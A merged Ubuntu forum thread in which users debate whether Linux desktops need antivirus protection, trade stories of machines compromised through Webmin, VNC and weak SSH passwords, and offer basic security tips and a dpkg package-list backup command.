2. Linux users are generally MUCH smarter than Windows users so we know not to click on attachments we don't trust, etc.

pretty arrogant and wishful thinking, i'm afraid. the ubuntu forum is scattered with people who try before they read. and social engineering is the most serious computer security tread.

What does `enough' mean? Not a single Linux-using friend of mine has ever gotten a virus or any other type of malware. I think that's enough.
this was exactly my attitude in the in the early DOS-age. only proof of concept viruses existed until a real virus destroyed much of my data.
for normal users data is more important than the system. linux - in general - is very good at protecting the system, but data can always be destroyed. so backup your data and be aware of rootkits.

and yes, it can destroy your data, but this is why doing incremental backups are good...also, i'd rather not reinstall the whole OS cuz i can rarely remember all the apps i had installed so i usually can't remember to but everything back like it was

to backup your list of apps:
$ dpkg --get-selections | grep -v deinstall > installed-software.log

restore system:
# dpkg --set-selections < /backup/installed-software.log

see:
http://www.cyberciti.biz/tips/linux-get-list-installed-software-reinstallation-restore.html

Using a different OS certainly helps, but it's not a 100% solution. I voted "Yes" anyway, though. At the moment, viruses aren't an issue. Rootkits are hard enough to pick up.

Keep in mind that even though Linux isn't #1 in personal computers, it's been #1 in servers for some time now. If Linux is as vulnerable as some people say it is, there'd at least be a good chance of picking up a virus. But there isn't. I haven't heard of a single Linux user who's picked up one. Not saying that there hasn't been one, I'm just saying that it's extremely rare.

One thing that annoys a computer user the most is finding a virus on their computer. Most often, the targets of these attacks are Windows computers. That is because 80% of the computers in the world have Windows as their operating system.

My question to you is this.

If you have a non-windows operating system on your computer (such as Mac, Ubuntu, Debian, etc.), do you have enough virus protection on your computer?
You are making a lot of assumptions. Your biggest assumption is that Windows gets the most viruses "because 80% of the computers in the world have Windows as their operating system". This is wrong. There are two (among many, of course) general reasons why Windows computers get viruses. 1) Windows is a joke when it comes to security. The word security and Windows are like oil and water. 2) The userbase of Windows is poorly educated. However, poor education does not invalidate #1 or make it less noteworthy, nor does it make #1 "OK".

Let me put it to you this way, Apache (open source, usually runs on GNU/Linux or BSD) has a much, much bigger market share than ISS (Microsoft) in the server market. By your assumption that should mean that Apache should have many more security problems that ISS. Guess what? It does not. In fact, ISS wins this comparison when it comes to having major server problems and vulnerabilities even with a much smaller market share than Apache.

And that brings the last point: GNU/Linux has the majority of market share on the server - no other operating system comes close. Therefore GNU/Linux should also have a ton of viruses. It does not. In fact, has anyone even heard of one wide-spread real GNU/Linux virus?

Before someone jumps on the information above by claiming that GNU/Linux does not have a very large market share lead over Windows: there are a lot of sources with bad information, either because they are incompetent, because they are paid by Microsoft (seriously, you would be surprised how many there are) or both. Those "experts" that actually show Redhat and Debian as being separate from GNU/Linux need not apply. Also notice that most of the "unknown" servers run either GNU/Linux or BSD (with GNU/Linux being the majority). For more statistics, check out netcraft. And remember: there is no such thing as 100% accurate statistics when it comes to server market research.

If Linux ever becomes as popular as windows, then we would be in trouble.

Being open source does have it's advantages and disadvantages. Crackers can easily search through the code. Luckily there is an enormous open source community to try and beat them to it. Can the Open source community patch holes fast enough if their was a "15 minute of fame" scenario like a self propagating Internet Worm? Look at what just happened to symantic (http://research.eeye.com/html/alerts/AL20061215.html) Even If there was Anti Virus software installed, it would have to be professional grade. One of the few GPL'ed Anti Virus scanners, Clam AV, isn't very good when compared to it's proprietary counter parts. I don't think it can even catch polymorphic worms (worms where each of it's offspring is encrypted differently).

Any way It looks like being unpopular has it's advantages.

(ok I'll shut up now)

You are making a lot of assumptions. Your biggest assumption is that Windows gets the most viruses "because 80% of the computers in the world have Windows as their operating system". This is wrong. There are two (among many, of course) general reasons why Windows computers get viruses. 1) Windows is a joke when it comes to security. The word security and Windows are like oil and water. 2) The userbase of Windows is poorly educated. However, poor education does not invalidate #1 or make it less noteworthy, nor does it make #1 "OK".

Let me put it to you this way, Apache (open source, usually runs on GNU/Linux or BSD) has a much, much bigger market share than ISS (Microsoft) in the server market. By your assumption that should mean that Apache should have many more security problems that ISS. Guess what? It does not. In fact, ISS wins this comparison when it comes to having major server problems and vulnerabilities even with a much smaller market share than Apache.

And that brings the last point: GNU/Linux has the majority of market share on the server - no other operating system comes close. Therefore GNU/Linux should also have a ton of viruses. It does not. In fact, has anyone even heard of one wide-spread real GNU/Linux virus?

Before someone jumps on the information above by claiming that GNU/Linux does not have a very large market share lead over Windows: there are a lot of sources with bad information, either because they are incompetent, because they are paid by Microsoft (seriously, you would be surprised how many there are) or both. Those "experts" that actually show Redhat and Debian as being separate from GNU/Linux need not apply. Also notice that most of the "unknown" servers run either GNU/Linux or BSD (with GNU/Linux being the majority). For more statistics, check out netcraft. And remember: there is no such thing as 100% accurate statistics when it comes to server market research.

it is true that most servers run unix-based systems, but for the rest i think your statements are misleading because:
1) servers do have strict backup programs, home desktop computers (often) don't,
2) the majority of today's malware is designed by scriptkiddies and based on social engineering,
3) this makes the security of desktop pc's different from servers, and
4) makes "because 80% of the computers in the world have Windows as their operating system" a correct statement.

and yes, linux systems have been targeted by rootkits. read
http://www.usenix.org/publications/login/1999-9/features/rootkits.html

what i want to say is that running a non-windows OS doesn't provide sufficient protection. installing software that does not come from a trusted repo means a serious security tread.

pretty arrogant and wishful thinking, i'm afraid. the ubuntu forum is scattered with people who try before they read. and social engineering is the most serious computer security tread.

this may be true, but my thinking on it is if you're smart enough to know of/try an alternative to Windows, you're probably smart enough to know BASIC virus prevention....

Not just any non-Windows operating system. Linux, combined with the typical Linux-user's respect for security, is a pretty good combination that will beat a lot of viruses.

OS X has the potential to have a real virus problem - IIRC there are at least 29 published kernel vulnerabilities that have not been fixed, and there are a couple of other well-known vulnerabilities in user-space. Apple also takes longer to package security updates to its included FOSS applications than most Linux distributions; Damn Small Linux with its 3 month release cycle probably beats Apple for turnaround time on security updates.

I worry about Syllable - if it ever became popular, I think it would have a virus problem too. Like Microsoft, the developers of Syllable have created an operating system and then started to think about retro-fitting a proper security system.

For stupid people who are in root all the time and do stupid things....no

For people who know not to run random crap...yeah, probably

I still have ClamAV installed on my laptop though. Oddly, I'm the not-stupid-computer-user in the family. I didn't put it on my mom's computer. In this case, it works though. No one else in my family will ever do anything as root, and if they do anything sudo it's um..wait...they *might* attempt to use Synaptic a couple of times. That's the extent of it. I have it on mine to avoid passing things on to Windows-users if I get an infected jpeg or something.

The speed of fixing possible exploits is what makes FF better than IE though...that does help a lot.

...

It can still delete all your data. I care much more about my data than my system, because the system can easily be reinstalled, but the data is lost for ever.
You generally just back up your own data, not the whole system, don't you?

On the computer I use, each member of my family has a different account. So if one gets a virus it is sandboxed to that person's home. It's not a great solution (that person could still lose all their stuff), but it's better than all of us having a problem.

to backup your list of apps:
$ dpkg --get-selections | grep -v deinstall > installed-software.log

restore system:
# dpkg --set-selections < /backup/installed-software.log

see:
http://www.cyberciti.biz/tips/linux-get-list-installed-software-reinstallation-restore.html

Thanks for this bit, it'll save me the time of maintaining my own script. This will make a nice cron job. ;)


this may be true, but my thinking on it is if you're smart enough to know of/try an alternative to Windows, you're probably smart enough to know BASIC virus prevention....

Not neccessarily. Having used my computer a couple of my friends were seduced by Linux/KDE and found themself on their way home later with a Kubuntu cd in hand 8) I assure you that one of these friends was clueless when it comes to security (and probably still is). What's more, he's spreading Linux to his friends and family, some of which are more clueless about computer security than he is. The theory that if you're smart enough to try linux then you probably know these sorts of things just doesn't hold anymore.

I think Linux-based systems are very safe. As ssam said, and as I have always said, you are only safe from known virus's, as anti-virus companies have to play catch up. They can't beat it until someone has been beaten by it!

this may be true, but my thinking on it is if you're smart enough to know of/try an alternative to Windows, you're probably smart enough to know BASIC virus prevention....

i'm quite paranoid when it comes to computer security, but i have to admit i have been fooled by social engineering about 3 times in the past 5 years. :oops:
my only protection was that i wasn't running the OS they targetted. but a similar attach aimed at linux (or worse, cross-platform) would have been effective. makes me even more paranoid :???:

This is a huge NO!!!!

thats why Novell and Red Hat are working on projects. This is the whole reason seLinux and apparmor exist

Low market share making you a less likely target may not be the only factor determining security against viruses, but it is a big factor, and I don't see Linux desktop marketshare increasing by a significant margin overnight, so I voted "yes."

That said, I think if you get enough stupid users (and there are varying levels of stupidity, of course--not all Ubuntu users are smart when it comes to security, but I'd say on the whole, they tend to be a little bit more informed about malware than the average Windows user) and malware writers start creating double-click .deb files that are viruses, security goes out the window.

If the user will click on anything and give an admin password away to anything, then what good does security structure in the OS do?

I've merged all the security discussion (leaving out security support threads) here, and I think if you read through it, you'll see that there are varying answers ranging from "there's no difference" to "there's a huge difference."

Read the arguments and draw your own conclusions based on logic, experience, and examples.

Attached is an older poll that got eaten up by the merger.

Greetings. Me and a good friend of mine seem to love debating the ups and downs of windows and linux. Yeah, he's tried a few times to use linux and liked it somewhat. But usually gave up after trying to install ATI video drivers. (Poor ati. When will they support all of their customers?)

Anyway, he posed a thought that I found rather interesting. If everyone used linux, there would be tons of spyware for linux as there is for windows. I do not believe it to be .... So, instead of debating it with him, I've decided to bring it to the community (true linux style) And... here is an excerpt of the chat we had.

----------------------------------------------------
(07:09:58 PM) xxxMExxx: im just debating the use of linux to the computing population that uses windows for the sole pourpose of playing bejeweled and slingo.

(07:10:09 PM) xxxMExxx: saying its superior.

(07:10:15 PM) xxxWINDOWS USERxxx: Like I said, if every PC on the face of the planet was a linux box.. there would be just as many exploits, hacks, spyware, everything else as there is for windows now

(07:10:16 PM) xxxMExxx: then you called me an elitist. or something

(07:10:18 PM) xxxWINDOWS USERxxx: That's simple logic

(07:10:27 PM) xxxMExxx: id have to disagree

(07:10:38 PM) xxxWINDOWS USERxxx: How can you?

(07:10:52 PM) xxxMExxx: i can take it to several windows and linux based forums and let the populace answer?
----------------------------------------------------

There you have it guys. Does linux have the capabilities to fend off spyware with everyone programming for it? Are the community driven programming and development teams enough to fend off an army of spyware? Will we fix bugs as soon as they crop up, as we have in the past? Or will it be Windows ME all over again?

one of the key differences between linux and windows is the use of executable files for programs. spyware is basically an executable program that slipped onto your computer undetected and executed itself in the background without you knowing it and, being an executable file which can do ANYTHING it pleases, harms your computer.

linux on the other hand has no file type like an .exe that can do everything and anything on its own.

now...would that stop people from trying to get spyware and such on your computer? no, but it would sure as hell make it alot harder :mrgreen:

linux on the other hand has no file type like an .exe that can do everything and anything on its own.
There are executable files in all operating systems, including Linux based ones, and whether you'll get malware by running an executable on your computer is completely a matter of trust and knowing what you're doing.

Linux is more secure than windows, this is true. Windows has more vulnerabilities, it's just a matter of fact. There's also common user error. Most people run Windows as administrator (something you really never do in Linux unless installing system-wide programs / maintenance etc). Windows just does not force good security, so most security related stuff depends entirely on firewalls, patches, antiviruses etc. In linux, even if there WERE the same number of viruses available - you're progably going to have to install them yourself for them to do any damage. In some sense, your friend is right. It's pretty likely that if Linux were as popular as Windows, more people would want to target it. That's just common sense. Whether they'd be successful or not is another question entirely. There's always the idiot contingent, who will install anything and everything, and open every email and such. Those boxes won't take long to be infected. Viruses and such wouldn't have nearly the same propogation level as they do on Windows though (ie, spreading from box to box via contact lists, file transfers, whatever), because like I said earlier, the viruses for linux are more likely to rely on social engineering (similar to spam) than exploiting vulnerabilities. Once they're installed - they may well be locked inside the user dir, which means any damage is limited. If they're installed system-wide (as root) then it's quite possible that those boxes would be completely compromised. There is ALWAYS the possibility that a virus can exploit a security hole (ie, in the actual code), and do massive damage, but the nature of open source means that these holes either never appear, or are patched and closed within hours (sometimes even minutes) of discovery. Windows security updates are released on a schedule, meaning holes can be left open for months, giving viruses time to propogate.

Is this 2003? What computer has adware or spyware issues any more? Unless you are using windowsME, this isn't a real problem.

Ah... no, rabid. There are executable programs on Linux. They may not be tailed .exe, but do you think OSX programs are tailed .exe? A file does not need to be extensioned .exe to be executable.

Is this 2003? What computer has adware or spyware issues any more? Unless you are using windowsME, this isn't a real problem.

Are you kidding?

nope. nice grub editor by the way.

nope. nice grub editor by the way.

Thanks :)

But you're wrong about viruses.

I guess if you're stupid enough to run "freeporn.exe" from a spam email, then it's possible to get spyware/viruses. But the days of having to run adaware and spybot to get rid of random popups just by browsing the web are long gone.

I guess if you're stupid enough to run "freeporn.exe" from a spam email, then it's possible to get spyware/viruses. But the days of having to run adaware and spybot to get rid of random popups just by browsing the web are long gone.

Hmm, dunno about that. I routinely have to clear up all that crap from Windows boxes. Viruses are still common - but like I said earlier, they've turned to more social engineering tactics. The number of 'exploit' viruses (ie, those which just appear on your computer) seem to have dropped radically, but viruses in themselves are still far too common. Just do a search on Limewire or something - I can almost guarantee that many of the files returned will be far too small to be the real thing, but will have the right name. Virus ahoy.

I find that almost everything bad makes its way through Internet Explorer though. There still must be enough exploitable bugs and stuff. Let's put it this way: it's still not safe to run XP without an antivirus and a firewall.

what was the name of that guy that supposedly came back from the future(where, allegedly, most of the world used unix) to the present because he had to rectify the 2038 unix problem or something? its the sort of story one reads about in the Fortean Times. after googling, it appears that his name is john titor. click (http://johntitor.strategicbrains.com/) and click (http://www.johntitor.com/Pages/5100.html).
i suppose this is kinda off-topic, but its interesting...even if it requires taking with a very small pinch of salt.

I guess if you're stupid enough to run "freeporn.exe" from a spam email, then it's possible to get spyware/viruses. But the days of having to run adaware and spybot to get rid of random popups just by browsing the web are long gone.

really? where were you these past few months and a couple of years?
far too many will agree that they are thriving more than ever :D

Linux isn't popular. 70% of the websites are hosted in Linux servers, including Google and Yahoo. Why bother attacking Linux? Pffft

If desktop Linux had the kind of marketshare Windows currently enjoys, it would also have a lot of stupid users--the kind who want to download every "cool" program and toolbar and plug-in possible without checking what else comes along with those programs, the kind who will enter their passwords for just about anything.

It would not be difficult to see how malware would be rampant. Just create a bunch of "cool" programs on download.com that came as .deb files. People would download the .deb files, double-click them, authenticate with a password, and give that "cool" program systemwide access.

well it is just as easy to hack into a linux system as it is a windows one, but in my opinion even if Linux got the market away from windows I dont think many will target it...
Its policy that will make the difference, while MS tries to opress compitition Linux is open to it.
and the linux philosophy will prevent hackers as well, a high priced megabucks company is more of a target then one that would be flexible.

Im really digging your responses, keep it up.

But I'm having trouble finding a good windows support forum to post this topic on. I want to be as unbiast as possible. (One I did find that had plenty of users bands gmail.com)

Any suggestions?

It would not be difficult to see how malware would be rampant. Just create a bunch of "cool" programs on download.com that came as .deb files. People would download the .deb files, double-click them, authenticate with a password, and give that "cool" program systemwide access.As I stated before in a similar thread, while this is theoretically true, the centralized repository model excels here over the "search for software via Google and download from download.com" model in that there would be no malware in the official repositories. Same would go for well known third party repositories, which undergo tight peer review. The typical non-technical user is almost guaranteed not to need anything from outside the official and well known third party repositories when using Linux, whereas with Windows, they'll need to search the web for third party apps for many common tasks, a lot which contain malware.

I've merged this with the other similar thread--this argument about market share's relation to vulnerability/exploits is quite popular.

one of the things I've been telling some friends is that for someone to hack into ur linux comp and actually edit/remove anything, they would have to brute force ur password is that not true?

Not true...

Linux (like Windows & OSX or any other OS) is not an island unto itself. Any applications that run on the OS have the potential to be hacked. There have been numerous vulnerabilities over the years in Apache, sendmail, PHP, Webmin, CPanel, various buletin boards, VNC, and the list goes on and on. If the applications are not not updated (or not securely installed), they can leave very easy methods of entry into your computer.

So, the basic premise to security is this:
1. Strong passwords
2. Keep the OS updated
3. Keep applications updated
4. Turn off all unnecessary services
5. Use a firewall
6. Run anti-virus (mostly Windows, but not unwise in Linux)
7. Run anti-spyware software / anti-rootkit software from time-to-time

In 15+ years of running Windows, I have never had a virus or been hacked. In 2 years of running Ubuntu, I've got hacked twice. Once was my fault because I failed to remove Webmin after playing with it. The other time was due to a major unpatched bug in VNC (http://www.ubuntuforums.org/showthread.php?t=327275) that allowed users to control my desktop without using a password (no damage done, fortunately, as I happened to be in front of my computer when the hack occured).

-Dave

this is sort of on topic so one more question-

I kind of assumed these were a given for any OS
2. Keep the OS updated
5. Use a firewall

but why is it that I see all over the place people not worried in the least about the other methods and never having a problem appearently runnig unprotected for years and i've been going almost a year on 3 comps with no trace of spyware or anything else for that matter.
I'm not trying to discredit your answer, I want your opinion, it just seems maybe you were really lucky with windows and really unlucky with linux judging by most everyone elses experience.

You need to recognise the difference between Linux and Linux software. If the software is vulnerable, then it's vulnerable, it's as simple as that. Linux itself is very secure, and does employ security features to limit the damage an attack could do. Aside from that though, security is pretty much your own responsibility. If you don't update your software regularly, then you'll miss out on the patches and upgrades which close security holes. Given time, people work out how to exploit these vulnerabilities. It's really a trade off between developers writing robust software, and your own vigilance. One would hope that developers would be responsible and proactive regarding vulnerabilities, and in my experience, the open-source world has never let me down here. I have only ever been attacked through propietary stuff, on Windows.

You also leave kind of 'electronic trail' through your internet adventures. If you visit a compromised website, then your IP address and some information about your system and software is visible. If the attacker knows of a vulnerability in say, Firefox, then he/she can just keep sitting there bouncing attacks off your IP until something sticks. Utilising a firewall and other similar software can help you, but really - once you make the decision to download and run something, the security is in your hands.

I've already worked out a way Ubuntu could be hit by an attack. Obviously I'm not irresponsible enough to come on here and say it though. As long as users are stupid or naive, any o/s is vulnerable, even Linux. The fact that many Linux users don't have their guard up makes it even easier for people who would want to attack. IMO it's not 'if' but 'when'. Sorry if this sounds bad but most virus writers are out to prove a point and the fact that many linux users say so much about Linux being virus free obviously makes Linux a target/challenge for them. I dont think the whole permission based file system thing will protect against people who want to hack it.

this is sort of on topic so one more question-

I kind of assumed these were a given for any OS


but why is it that I see all over the place people not worried in the least about the other methods and never having a problem appearently runnig unprotected for years and i've been going almost a year on 3 comps with no trace of spyware or anything else for that matter.
I'm not trying to discredit your answer, I want your opinion, it just seems maybe you were really lucky with windows and really unlucky with linux judging by most everyone elses experience.

I would suspect that most "average" Ubuntu users do not enable any sort of external access (ssh, vnc, etc.) or unneeded services (apache, webmin, sendmail, ISPconfig, etc.) that are bigger targets for exploit scanners. If they are behind a NAT router, their existence is virtually invisible to port scanners, and most viruses & malware are not written for Linux users.

As for whether I was lucky with Windows & unlucky with Ubuntu, I don't think it was a luck factor in my case.

A little background first, though:

I am an IT professional for the past 15 years or so, so I'm not an "average" user. I like to explore, test, tweak and install new packages. I love networking computers together and accessing them remotely using all sorts of tools (ssh, vnc, ftp, scp, samba, etc.). Virtually all of the desktop machines have been responsible for have been Windows (from 3.1 through XP), so my experience and expertise is far greater in this area than in Linux or OSX, for example. On the server side, I've run Netware, NT4, 2000, 2003, RHEL and AIX, but as these are production servers, they only run necessary services.

When I finally decided to only use Linux on my home PC, I needed applications to replace some of the ones I used in Windows (pcAnywhere, UltraVNC) that permitted me to have remote access to and from work. I also used my home machine to test out various applications and services.

The most recent hack I suffered was an over-sight by the developers who maintain VNC in Ubuntu. The vulnerability was found (and fixed) in May of 2006, but the maintainers failed to update the package in the repos for over 6 months. Had the vulnerability existed in the Windows-version of VNC (it didn't), I would've been bitten on my latop as well.

The previous hack was my own fault. Again, I was looking at other options to some of the software I use at work (IIS, e-mail, DNS, firewall, squid, etc) and installed the packages on my home computer so that I could play around with them. I had also discovered a couple of graphical admin packages (webmin and ISPConfig) that allowed easy remote administration. I enabled access to the admin tools from the external interface of my NAT router so that I could fiddle with it at work. After messing around with it for a few days, I did not disable external access to it (nor did I ensure that the packages were up-to-date... I just kinda forgot about it).

As with most exploits, it is only a matter of time before some script kiddie comes along and scans your machine for a specific vulnerability and I got hit. Like I said, I'm not sure which one specifically bit me but I'm pretty sure it was webmin (http://www.saintcorporation.com/cgi-bin/demo_tut.pl?tutorial_name=Webmin_vulnerabilities.h tml&fact_color=&tag= and http://www.fduran.com/wordpress/?p=33)

I guess the issue with Ubuntu (specifically for the newbie) is the reliance on the repos to maintain the most up-to-date packages. In the case of VNC, the package in the repos was not up-to-date and I got burned. I take some of the responsibilty myself, as I know the repercussions of exposing a machine to the internet (and port-forwarding, etc.). The other issue is for the more adventurous sort (like me) who occasionally compile from source and fail to keep the package updated (i.e. webmin).

It's a lesson learned (the hard way) but it just goes to show that an OS is only as strong as it's weakest application or dumbest user.

-Dave

I got hacked once because I had a brain drain and set a test user up with the same username and password while having SSH set up. 1 dictionary SSH login attack later and someone was using my mail server to send spam. I should have known better and anyone who enables SSHd should know this stuff too. Ubuntu doesnt have anything running (listening) by default on a standard install so nothing to attack or compromise. Of course the kernel will respond to ICMP echo requests as standard but most people are behind NAT routers now.

To dbott67 ^ Have you tried NX?

well that sheds alot of light on it for me, thanks for the follow up.

I'm only a semi-tone step above the "average" user so for some time to come I won't be using software like ssh, vnc, apache, webmin, sendmail, or ISPconfig. although maybe i should review my port forwarding setup, otherwise i'm feeling much more comfortable than when I 1st opened my mouth.

To dbott67 ^ Have you tried NX?

Thanks for the tip, Darren.

I just took a look at nomachine.com and took a testdrive. Pretty slick.

Is there a package in the repositories? I just did a quick search of the forums and see a few howtos on freenx. Are there any that you recommend? I'm running Dapper. I've found this one & will try it out later:
http://www.ubuntuforums.org/showthread.php?t=241651&highlight=freenx+dapper

Thanks,
Dave

Well, its hardly a surprise that even casual internet browsing is likely to earn a few sneaky things with IE, as well as the everpresent threat of vira.

I know that Linux is considerably more safe, but being the n00b I am, Im not sure entirely why.. except that more vira is targeted at windows.
But if the same people sat down, and decided to deliberately go after Linux machines, would it be as easy ?

Same goes for spyware ?


Please dont think that I am trolling or trying to start arguments, Im genuinely wondering about the hows and why's of all this.

Cheers
Ivan
Considering that I used to run Windows without an anti-virus and never had a virus (although I did run regular spyware checks), I naturally am very confident that lacking both of the aforementioned will not give me an trouble in Linux.

Thanks for the tip, Darren.

I just took a look at nomachine.com and took a testdrive. Pretty slick.

Is there a package in the repositories? I just did a quick search of the forums and see a few howtos on freenx. Are there any that you recommend? I'm running Dapper. I've found this one & will try it out later:
http://www.ubuntuforums.org/showthread.php?t=241651&highlight=freenx+dapper

Thanks,
Dave

I used to use VNC but found it a bit too bandwidth heavy.

I just download the 3 packages from www.nomachine.com - Free Linux server, NXNode and NXclient for Debian/Ubuntu and install.

Make sure your sshd_config has the authorized_keys file set to ~/authorized_keys2 and restart SSH and it just works over port 22 forwarding and compressing X. I swear by it now.

the title says nothing about macintosh...

Thanks, Darren.

I installed NoMachine last night and played around with it at home and it seems very fast. This morning when I got to work, I remotely logged in and it was FAR faster than VNC. You sold me!

I guess the only downside is that you can't connect directly to the console (i.e. session:0 --- the active desktop). I can log in to "my" desktop using my login credentials, but I guess it's just a virtual desktop.

Anyhow, thanks again.

-Dave

the title says nothing about macintosh...

why should it?

The wideer user base theory is nonsense, for a large part.

It probably makes some difference, but Linux is inherently more secure.

If i were a malicious programmer, I would want to hit the servers. Most servers run Linux, so I'd target Linux; yet we don't hear about Linux server malware.

Plenty of Linux servers get rooted. Usually because of a hole in a php package, combined with a not-so secure setup (because of inexperience).

The problem isn't as bad as with Windows botnets, but for every operating system you should take the same basic security precautions (turn off unnecessary services, pick a secure password, use a NAT router and/or firewall, keep your OS updated, and don't run apps from untrusted sources (!) ).

I manage to keep my windows box at work clean this way, even though I run as admin (yes, I know I shouldn't), and without an antivirus that's worth anything.

There is an excellent article on why linux/unix is less susceptible to malware at The register

http://www.theregister.co.uk/security/security_report_windows_vs_linux/

Here is an excerpt:

Many, if not most of the viruses, Trojans, worms and other malware that infect Windows machines do so through vulnerabilities in Microsoft Outlook and Internet Explorer. To put the question another way, given the same type of desktop software on Linux (the most often used web browsers, email, word processors, etc.), Are there as many security vulnerabilities on Linux as Windows?

Windows Design
Viruses, Trojans and other malware make it onto Windows desktops for a number of reasons familiar to Windows and foreign to Linux:

Windows has only recently evolved from a single-user design to a multi-user model
Windows is monolithic, not modular, by design
Windows depends too heavily on an RPC model
Windows focuses on its familiar graphical desktop interface

Linux Design
According to the Summer 2004 Evans Data Linux Developers Survey, 93% of Linux developers have experienced two or fewer incidents where a Linux machine was compromised. Eighty-seven percent had experienced only one such incident, and 78% have never had a cracker break into a Linux machine. In the few cases where intruders succeeded, the primary cause was inadequately configured security settings.

More relevant to this discussion, however, is the fact that 92% of those surveyed have never experienced a virus, Trojan, or other malware infection on Linux.

Viruses, Trojans and other malware rarely, if ever, manage to infect Linux systems, in part because:

Linux is based on a long history of well fleshed-out multi-user design
Linux is mostly modular by design
Linux does not depend upon RPC to function, and services are usually configured not to use RPC by default
Linux servers are ideal for headless non-local administration
Keep in mind when reading the summaries below that there are variations in the default configurations of the different distributions of Linux, so what may be true of Red Hat Linux may not be true of Debian and there may be even more differences in SuSE. For the most part, all the major Linux distributions tend to follow sane guidelines in the default configurations.

Hi every1 , I thought that i would put this question out to u as its been bothering me for some time now.
We all know that there is not a real virus threat to Ubuntu Right now but what if somehow (although in due course of time , this WILL happen) 99% of Windows Users switched to Ubuntu and Ubuntu will be then as famous and widespread as windows is now. But then wouldnt system pirates create viruses towards the Ubuntu Operating System ??
Then what will we do ? The same old virus problems again and again as i used to face in windows ?!!
Do post your reply!!

This is an old, old topic for discussion, and I wouldn't be surprised if someone locks the thread. The answer is, Linux is more secure by design, and when security flaws are discovered, they are fixed very quickly. It's harder to write a spreadable virus for Linux than it is for Windows.

Check out this website for more information: http://linuxmafia.com/~rick/skoll/anti-virus.php

Let me ask a question. You think that there are no viruses in Linux because it's no that widely used all over the word like windows is on the desktops. Think again, most of the websites on the internet are hosted on servers that run linux but how many of them get infected? :confused:

one thing ashmew2 foregets to realize there are many flavors and variants to linux.
writing a virus that could infect a different type of linux (BSD,Debian,Gentoo,Slack)
would be hard and very bulky. and as someone has already mentioned serious flaws when found are fixed very fast.
with all the variants out there any future virus writers i wish em luck. Not impossible but seriously a monumental task.

hmmmm , thanks for the replies , most of my worries are sorted out now :D

hmmmm , thanks for the replies , most of my worries are sorted out now :D
No need to start sweating again, but I think it needs to be said that if linux was used in over 50% of machines, there would most certainly be a lot of viruses written for linux. It is another question how succesful they'd be -- I agree with the other posters that problems quite probably would not be as severe as they are with Windows.

Monoculture is bad in many ways, and computer security is a good example...

Microsoft Windows has so much fast-spreading virus is because of the OS's running service.
Windows OS itself open up many ways for virus to get in.

In the linux world, a desktop linux OS usually don't have so many services built in, thus prevent fast spreading virus.

of coz, you can still get infection on linux, but not the fastspread one.

By fastspread i means the ease of getting infection. I remember I caught a virus by just connecting to the internet. I didn't have to run any program, the virus just got its way into window XP by some holes. I had to manually patch the system to fix the hole.

So, there will be viruses for Linux, but won't get it as easy as windows.
For example, maybe someone sent you a file and you run it and it turn out to be a virus. In this case it is passive infection.

In the former windows case, it is an active infection, where you didn't have to do anything to get infected.

One great strength of the distro variety is that all the gnome login screens seem to look different. So there goes any hope of writing a spoofed login screen app. But some PC users are so incompetent that they might think, "Oh how neat, my login screen has a new color and font and theme," and then they type their password into it.

Let me ask a question. You think that there are no viruses in Linux because it's no that widely used all over the word like windows is on the desktops. Think again, most of the websites on the internet are hosted on servers that run linux but how many of them get infected? :confused:

Is it really possible to compare a server set up by a linux admin, with a desktop used by the average windows user? I'm not sure..
Now, if for example 50 % of windows servers were successfully attacked, and only 1% of linux servers were, maybe that would be more interesting. It could still only mean that linux admins are more skilled than windows ones, but at least it would be comparable.

If the majority of desktops were on Linux, and plenty of people used them only as root, doing crazy things, and not paying any attention at all, I don't think it would work very well.

Maybe in the case of an ideal perfectly secure os, the system would always be perfectly secure, no matter which user is running it, but I doubt it's the case.

You may be interested in reading some of the posts in the thread I just merged yours with.

I use Ubuntu on my home computer fully. No dual booting etc. Everything that I used to do in XP (2 years back), I can do in Ubuntu.

But I think here is what will happen if Linux comes preinstalled on Dells, HP etc.

People with no knowledge of security (firewalls etc) will start using Linux. As a result, people will start making packages that will comprimise the security of linux (adwares spywares).

Its very easy to lure an average user to download and run this rpm or dpkg package that promise to give a nice screen scaver or hints on saving tons on money on airtravel. The install script will ask the user to enter the root password. Once the script has the root password, the possibilities are endless- The script can do all that windows adware and spywares can do on a linux system.

So if linux becoms mainstream, there will be a lot of viruses, adwares and spywares that will attack linux. There will be paid antiviruses for linux and propitery applications that need to be bought just to do basic tasks.

Sorry.. but I like Linux the way it is and want the average user to think its only for hackers or people who like to use the command pormpt. I want to keep linux our "little secret"

[...]
Its very easy to lure an average user to download and run this rpm or dpkg package that promise to give a nice screen scaver or hints on saving tons on money on airtravel.
[...]


Who doesn't enjoy a nice screensaver or saving money on air travel?

You have nothing to worry about.

With centralized, trusted repositories, I don't see what the problem is. So other people will download sketchy .deb files. I won't. So others will give away their passwords to escalate permissions for sketch .deb files. I won't.

As long as you stick to the Ubuntu repositories, you'll be fine, even if everyone's using Ubuntu or some Linux distro.

Quite true; there are just as many linux warnings to watch repositories, as there is for Microsoft products to watch what you download for .exe files. It's simple common sense to know where you're downloading from. Call me crazy; but I think it's not hard to grasp the concept of using an ubuntu repo above bob'swarezemporium.ripoff It's like all things. Practice makes it better; and people need to give linux a chance to get comfort with it. We're not back in the mid 80s where you need a degree :)

I use Ubuntu on my home computer fully. No dual booting etc. Everything that I used to do in XP (2 years back), I can do in Ubuntu.

But I think here is what will happen if Linux comes preinstalled on Dells, HP etc.

People with no knowledge of security (firewalls etc) will start using Linux. As a result, people will start making packages that will comprimise the security of linux (adwares spywares).

Its very easy to lure an average user to download and run this rpm or dpkg package that promise to give a nice screen scaver or hints on saving tons on money on airtravel. The install script will ask the user to enter the root password. Once the script has the root password, the possibilities are endless- The script can do all that windows adware and spywares can do on a linux system.

So if linux becoms mainstream, there will be a lot of viruses, adwares and spywares that will attack linux. There will be paid antiviruses for linux and propitery applications that need to be bought just to do basic tasks.

Sorry.. but I like Linux the way it is and want the average user to think its only for hackers or people who like to use the command pormpt. I want to keep linux our "little secret"

Blah Blah, been hearing this for the last ten years. If the "regular" user gets a hold of Linux it will become stupid, dumbed down, not 133t, and full of viri.

I have been using it for 11 years and it keeps getting slowly better.

can anyone tell me how a virus works?

To seriously think that adware, spware, virii and the like will NOT come to linux when and if the majority of computer users come to linux, then you are lying to yourself, plain and simple. We can boast linux security all we want to, but programmers will just find a way to circumvent it. It's a cat and mouse game that has been happening on windows for a long time. Anways, I agree, I would rather my linux stayed low-profile, and if the day ever does come that this is no longer so, I will find something else that is low-profile.

